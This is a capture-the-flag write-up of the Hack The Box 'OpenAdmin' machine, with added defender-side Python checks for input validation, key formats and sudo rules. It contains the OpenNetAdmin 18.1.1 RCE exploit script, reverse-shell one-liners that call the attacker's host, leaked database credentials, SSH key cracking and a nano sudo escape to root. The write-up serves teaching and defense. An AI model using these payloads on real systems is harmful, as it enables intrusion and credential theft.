As always, we start with an nmap scan

┌─[puck@parrot-lt]─[~/htb/openadmin]
└──╼ $nmap -sC -sV 10.10.10.171 -oN allports.nmap
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-05 08:23 CEST
Nmap scan report for 10.10.10.171
Host is up (0.090s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.25 seconds

┌─[puck@parrot-lt]─[~/htb/openadmin]
└──╼ $ffuf -u http://10.10.10.171/FUZZ -w /usr/share/wordlists/dirb/common.txt

        v1.3.1-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.10.171/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/common.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

.htaccess               [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 95ms]
.htpasswd               [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 101ms]
.hta                    [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 102ms]
artwork                 [Status: 301, Size: 314, Words: 20, Lines: 10, Duration: 89ms]
                        [Status: 200, Size: 10918, Words: 3499, Lines: 376, Duration: 3530ms]
index.html              [Status: 200, Size: 10918, Words: 3499, Lines: 376, Duration: 112ms]
music                   [Status: 301, Size: 312, Words: 20, Lines: 10, Duration: 102ms]
server-status           [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 106ms]
:: Progress: [4614/4614] :: Job [1/1] :: 391 req/sec :: Duration: [0:00:14] :: Errors: 0 ::
I started to focus on two directories, ona and music. I opened http://openadmin.htb/ona, which brought me to a web page. This is the OpenNetAdmin control panel. OpenNetAdmin is an open-source IP Address Management (IPAM) system.
A warning on the home page indicates that the app version is 18.1.1. A quick Google search for vulnerabilities in version 18.1.1 shows that this version is vulnerable to RCE (remote code execution). So at this point we understood that this box is the victim of a recently discovered exploit.
ExploitDB lists two exploits: a Metasploit module and a bash script.
#!/bin/bash
# Exploit Title: OpenNetAdmin 18.1.1 - Remote Code Execution
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux

# First argument: base URL of the ONA install, e.g. http://<host>/ona/
URL="${1}"
while true; do
    # read a command from the operator and pass it through the 'ip' argument
    echo -n "$ "; read cmd
    # the BEGIN/END markers let sed cut the command output out of the XML reply
    curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done
I just download the script to my OpenAdmin working directory and run it. The script immediately gave me a shell as www-data.

┌─[puck@parrot-lt]─[~/htb/openadmin]
└──╼ $curl -s -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;id&xajaxargs[]=ping" http://10.10.10.171/ona/ | html2text
<?xml version="1.0" encoding="utf-8" ?>
CDATA[removeElement('tooltips_results');]]>
CDATA[div]]>
CDATA[initialize_window('tooltips_results');el('tooltips_results').style.display = 'none';el('tooltips_results').style.visibility = 'hidden';el('tooltips_results').onclick = function(ev) { focus_window(this.id); };]]>
CDATA[ Ping Results [/ona/images/icon_close.gif] uid=33(www-data) gid=33(www-data) groups=33(www-data) [Unknown INPUT type] ]]>
CDATA[toggle_window('tooltips_results');]]>
┌─[puck@parrot-lt]─[~/htb/openadmin] └──╼ $curl -s -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;bash -c 'bash -i >%26 /dev/tcp/10.10.14.3/443 0>%261'&xajaxargs[]=ping" http://10.10.10.171/ona/
and catch the shell

┌─[✗]─[puck@parrot-lt]─[~/htb/openadmin]
└──╼ $sudo nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.171] 54102
bash: cannot set terminal process group (1237): Inappropriate ioctl for device
bash: no job control in this shell
www-data@openadmin:/opt/ona/www$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@openadmin:/opt/ona/www$

Since www-data is a low-privileged user, we can't do much with it. So we need to escalate its privileges to the next, more important user.
Of course you can also use Burp, as shown below,
and then use a Netcat reverse shell without nc -e
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.70 443 >/tmp/f
Of course, URL-encode it first with CTRL-U in Burp.
First we need to find the users on the box. Let's use cat /etc/passwd to find them:

-snip-
jimmy:x:1000:1000:jimmy:/home/jimmy:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
joanna:x:1001:1001:,,,:/home/joanna:/bin/bash

So we found a number of users on this box, but I'm not sure which of the above to start with to get privileges. Let's start enumerating the box, looking for hints.
After a while I found a PHP file named "database_settings.inc.php" in the directory /opt/ona/www/local/config/. The file contains MySQL database credentials.

www-data@openadmin:/opt/ona/www$ cat /opt/ona/www/local/config/database_settings.inc.php
<?php
$ona_contexts=array (
  'DEFAULT' =>
  array (
    'databases' =>
    array (
      0 =>
      array (
        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'ona_sys',
        'db_passwd' => 'n1nj4W4rri0R!',
        'db_database' => 'ona_default',
        'db_debug' => false,
      ),
    ),
    'description' => 'Default data context',
    'context_color' => '#D3DBFF',
  ),
);
?>
www-data@openadmin:/opt/ona/www$
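From the defender's side, the root cause of all of the above is that the `ip` argument of the tooltips/ping window reaches a shell without validation. The Python below is an added example, not ONA's code and not from the original post: it parses an xajax POST body the way the requests above are built (the `ip=>value` argument convention is taken from those requests; the ping handler itself is assumed) and applies the check that should have been there, accepting only an IP address or a plain hostname.

```python
import ipaddress
import re
from urllib.parse import parse_qs

# RFC 1123 style hostname: dot-separated labels of letters, digits and hyphens
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[a-z0-9-]{1,63}(?<!-)(\.(?!-)[a-z0-9-]{1,63}(?<!-))*$", re.I
)


def parse_xajax_body(body: str) -> dict:
    """Split an xajax POST body into the called function and its key=>value args.

    Mirrors the request layout used above: xajax=<function> plus xajaxargs[]
    entries, one of which carries 'ip=>value' for the ping tooltip.
    """
    fields = parse_qs(body, keep_blank_values=True)
    args = {}
    for raw in fields.get("xajaxargs[]", []):
        if "=>" in raw:
            key, value = raw.split("=>", 1)
            args[key.strip()] = value
    return {"function": fields.get("xajax", [""])[0], "args": args}


def is_valid_ping_target(value: str) -> bool:
    """Accept only a literal IP address or a plain hostname; shell
    metacharacters (';', '|', '`', quotes, spaces) can never get through."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return bool(HOSTNAME_RE.match(value))


def screen_request(body: str) -> bool:
    """True if the request is safe to hand to the ping handler."""
    target = parse_xajax_body(body)["args"].get("ip")
    return target is not None and is_valid_ping_target(target)


# Constructed bodies: INJECTED has the shape of the 'id' probe above,
# BENIGN is what a legitimate tooltip ping looks like.
INJECTED = "xajax=window_submit&xajaxr=1&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;id&xajaxargs[]=ping"
BENIGN = "xajax=window_submit&xajaxr=1&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E10.10.10.1&xajaxargs[]=ping"
```

The same check applied at a reverse proxy or WAF on the POST body of /ona/ also gives a detection point, since a legitimate tooltip ping never carries a semicolon in `ip`.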
PRIVILEGE ESCALATION
Since SSH is open, I tried the box as jimmy; luckily it worked.

root@kali:~/htb# ssh jimmy@10.10.10.171
The authenticity of host '10.10.10.171 (10.10.10.171)' can't be established.
ECDSA key fingerprint is SHA256:loIRDdkV6Zb9r8OMF3jSDMW3MnV5lHgn4wIRq+vmBJY.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.10.171' (ECDSA) to the list of known hosts.
jimmy@10.10.10.171's password: n1nj4W4rri0R!
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed Jan  8 12:44:49 UTC 2020

  System load:  1.25              Processes:             147
  Usage of /:   49.1% of 7.81GB   Users logged in:       1
  Memory usage: 31%               IP address for ens160: 10.10.10.171
  Swap usage:   0%

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

41 packages can be updated.
12 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Wed Jan  8 12:25:57 2020 from 10.10.14.11
jimmy@openadmin:~$ ls
jimmy@openadmin:~$ id
uid=1000(jimmy) gid=1000(jimmy) groups=1000(jimmy),1002(internal)

After a while, however, I found that this user does not have the user flag, so let's keep enumerating. The user's www folder has a special directory named 'internal' which contains:

jimmy@openadmin:/var/www/internal$ ls -la
total 20
drwxrwx--- 2 jimmy internal 4096 Nov 23 17:43 .
drwxr-xr-x 4 root  root     4096 Nov 22 18:15 ..
-rwxrwxr-x 1 jimmy internal 3229 Nov 22 23:24 index.php
-rwxrwxr-x 1 jimmy internal  185 Nov 23 16:37 logout.php
-rwxrwxr-x 1 jimmy internal  339 Nov 23 17:40 main.php
jimmy@openadmin:/var/www/internal$ cat main.php
<?php
session_start();
if (!isset ($_SESSION['username'])) {
    header("Location: /index.php");
};
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>
jimmy@openadmin:/var/www/internal$

jimmy@openadmin:/var/www/internal$ curl http://127.0.0.1/main.php
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 127.0.0.1 Port 80</address>
</body></html>
jimmy@openadmin:/var/www/internal$

jimmy@openadmin:/var/www/internal$ netstat -tulpn
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:52846         0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp6       0      0 :::80                   :::*                    LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -
udp        0      0 127.0.0.53:53           0.0.0.0:*                           -
jimmy@openadmin:/var/www/internal$

jimmy@openadmin:/var/www/internal$ curl http://127.0.0.1:52846/main.php
<pre>-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D

[encrypted key body omitted]
-----END RSA PRIVATE KEY-----
</pre><html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>
jimmy@openadmin:/var/www/internal$
root@kali:~/htb/openadmin# python sshng2john.py id_rsa > id_rsa_encrypted
root@kali:~/htb/openadmin# john id_rsa_encrypted --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:05 37.30% (ETA: 11:49:29) 0g/s 1095Kp/s 1095Kc/s 1095KC/s misscohen..missclowy-14
bloodninjas (id_rsa)
Warning: Only 1 candidate left, minimum 2 needed for performance.
1g 0:00:00:13 DONE (2020-01-08 11:49) 0.07570g/s 1085Kp/s 1085Kc/s 1085KC/s *7¡Vamos!
Session completed
root@kali:~/htb/openadmin# ssh -i id_rsa joanna@10.10.10.171
Enter passphrase for key 'id_rsa': bloodninjas
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Jan  9 15:12:18 UTC 2020

  System load:  1.08              Processes:             136
  Usage of /:   49.0% of 7.81GB   Users logged in:       1
  Memory usage: 30%               IP address for ens160: 10.10.10.171
  Swap usage:   0%

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

41 packages can be updated.
12 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Thu Jan  9 09:46:48 2020 from 10.10.16.70
joanna@openadmin:~$ cat user.txt
c9b2cf07d40807e62af62660f0c81b5f
joanna@openadmin:~$
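Why did john get through that key in 13 seconds? Its own output says so: KDF/cipher 0 (MD5/AES) with an iteration count of 1, which is the legacy PEM format where one passphrase guess costs one MD5, so rockyou runs at a million guesses per second. The Python below is an added defender-side check, not part of the original post: it classifies a private key by its passphrase protection (legacy encrypted PEM, unencrypted PEM, or the newer OPENSSH format with the bcrypt KDF that `ssh-keygen -o` produces). The sample keys are constructed; only their header lines and format prefix matter to the audit.

```python
import base64
import re
import struct

MAGIC = b"openssh-key-v1\x00"
LEGACY_HEADER_RE = re.compile(r"^-----BEGIN (RSA|DSA|EC) PRIVATE KEY-----$")

def _read_string(raw: bytes, pos: int):
    """Read one SSH wire-format string (uint32 length + bytes) at pos."""
    (n,) = struct.unpack(">I", raw[pos:pos + 4])
    return raw[pos + 4:pos + 4 + n], pos + 4 + n

def audit_private_key(text: str) -> str:
    """Classify a private key by its passphrase protection: 'legacy-pem-md5'
    (Proc-Type: 4,ENCRYPTED, one MD5 per guess, what john cracked above),
    'legacy-pem-plain', 'openssh-bcrypt', 'openssh-plain' or 'unknown'."""
    lines = [ln.strip() for ln in text.strip().splitlines()]
    head = lines[0] if lines else ""
    if head == "-----BEGIN OPENSSH PRIVATE KEY-----":
        body = "".join(ln for ln in lines[1:] if not ln.startswith("-----"))
        raw = base64.b64decode(body)
        if not raw.startswith(MAGIC):
            return "unknown"
        cipher, pos = _read_string(raw, len(MAGIC))  # ciphername
        kdf, _ = _read_string(raw, pos)               # kdfname: 'bcrypt' or 'none'
        if cipher == b"none":
            return "openssh-plain"
        return "openssh-bcrypt" if kdf == b"bcrypt" else "unknown"
    if LEGACY_HEADER_RE.match(head):
        if any(ln.startswith("Proc-Type: 4,ENCRYPTED") for ln in lines):
            return "legacy-pem-md5"
        return "legacy-pem-plain"
    return "unknown"

def make_openssh_sample(cipher: bytes, kdf: bytes) -> str:
    """Constructed OPENSSH-format sample: magic + cipher + kdf is all the audit reads."""
    raw = MAGIC + struct.pack(">I", len(cipher)) + cipher + struct.pack(">I", len(kdf)) + kdf
    b64 = base64.b64encode(raw).decode()
    return "-----BEGIN OPENSSH PRIVATE KEY-----\n%s\n-----END OPENSSH PRIVATE KEY-----\n" % b64

# Constructed legacy sample with the same header lines as the key served by main.php;
# the body is placeholder base64, not key material.
LEGACY_SAMPLE = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF

QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo=
-----END RSA PRIVATE KEY-----
"""
```

Run over every id_* file under /home/*/.ssh, anything reported as legacy-pem-md5 should be re-encrypted with a modern KDF, and the key itself should never be readable by a web application in the first place.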
Getting ROOT
Procedure 1: getting the root flag via nano:
The sudo -l command revealed that the user joanna can run /bin/nano /opt/priv as root without a password. If you see that a user can run nano as root, this is the easiest thing to exploit. Just 3 commands and the box is yours.
run:
joanna@openadmin:~$ sudo /bin/nano /opt/priv
gtfobins has a page on nano. The path to get a shell from sudo is as follows:
sudo nano
^R^X
reset; sh 1>&0 2>&0
This will give you a root shell 🙂
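The lesson for the administrator side is that any editor or pager in a sudoers rule is a shell in disguise, and NOPASSWD removes the last speed bump. The Python below is an added example, not from the original post: it parses `sudo -l` output into rules and flags binaries that GTFOBins lists with a sudo shell escape, nano included. The sample output is constructed in the shape of the finding described above (the post does not show the real `sudo -l` output).

```python
import os
import re

# Binaries whose GTFOBins sudo entries include a shell escape (nano, used
# above, is one of them); extend the set for your own environment.
SHELL_ESCAPE_BINS = {
    "nano", "vim", "vi", "less", "more", "man", "find", "awk",
    "python", "python3", "perl", "env", "bash", "sh", "tar", "zip",
}

# One rule line of `sudo -l` output: "(runas) TAG: ... command args"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")

def parse_sudo_l(output: str) -> list:
    """Extract the command rules from `sudo -l` output, skipping the Defaults block."""
    rules, in_rules = [], False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if m:
            argv = m.group("cmd").split()
            rules.append({
                "runas": m.group("runas").strip(),
                "nopasswd": "NOPASSWD:" in m.group("tags"),
                "binary": os.path.basename(argv[0]),
                "command": m.group("cmd"),
            })
    return rules

def assess(rules: list) -> list:
    """Flag rules whose binary can drop to a shell; NOPASSWD makes it critical."""
    findings = []
    for r in rules:
        if r["binary"] == "ALL" or r["binary"] in SHELL_ESCAPE_BINS:
            severity = "critical" if r["nopasswd"] else "high"
            findings.append((severity, r["command"], r["runas"]))
    return findings

# Constructed `sudo -l` output in the shape of the finding described above (the
# post does not show the real output); the cat rule is a benign control.
SUDO_L_SAMPLE = """Matching Defaults entries for joanna on openadmin:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User joanna may run the following commands on openadmin:
    (ALL) NOPASSWD: /bin/nano /opt/priv
    (root) /bin/cat /var/log/auth.log
"""
```

For the rule above the fix is not a longer argument list but a different design: a dedicated setuid-free wrapper or sudoedit, which never hands the user an interactive editor running as root.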
That's it. Thanks for reading.